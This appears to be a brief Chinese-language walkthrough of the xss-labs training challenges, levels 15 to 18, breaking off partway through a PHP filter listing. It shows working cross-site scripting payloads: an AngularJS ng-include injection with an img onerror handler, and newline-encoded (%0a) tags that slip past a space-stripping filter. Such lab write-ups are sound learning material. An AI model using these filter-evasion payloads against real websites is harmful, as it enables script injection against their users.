Xss-labs-level15-18
level15 看了一下源码,啥也没发现; AngularJS ng-include 指令: 包含的内容将作为指定元素的子节点。 ng-include 属性的值可以是一个表达式,返回一个文件名。 默认情况下,包含的文件需要包含在同一个域名下。 指向“ https://ajax.googleapis.com/ajax/libs/angularjs/1.2.0/angular.min.js ”的 <script> 加载失败 更换为: https://cdn.staticfile.org/angular.js/1.4.6/angular.min.js src='level1.php?name=test<img src=1 onerror=alert()>' level16 <a%0atype="text"%0a"alert"> 用 换行符%0a 取代空格,在html中同样可以运行 <img%0asrc="1.jpg"%0aonerror="alert(1)"> <?php ini_set("display_errors", 0); $str = strtolower($_GET["keyword"]); $str2=str_replace("script"," ",$str); $str3=str_replace(" "," ",$str2); $str4=str_replace("/"